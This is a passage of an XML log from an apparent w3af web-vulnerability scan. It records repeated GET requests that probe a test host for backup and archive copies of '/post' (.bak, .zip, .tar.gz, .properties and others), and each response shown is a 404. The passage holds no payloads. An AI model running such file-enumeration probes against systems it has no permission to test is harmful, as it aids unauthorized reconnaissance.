body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="330">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="332">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="333">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="334">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="336">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="338">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="339">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="340">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="341">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="342">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hivJkuZj HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="343">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="345">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="346">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="347">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="350">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="352">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="355">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="357">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="358">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="361">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="362">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
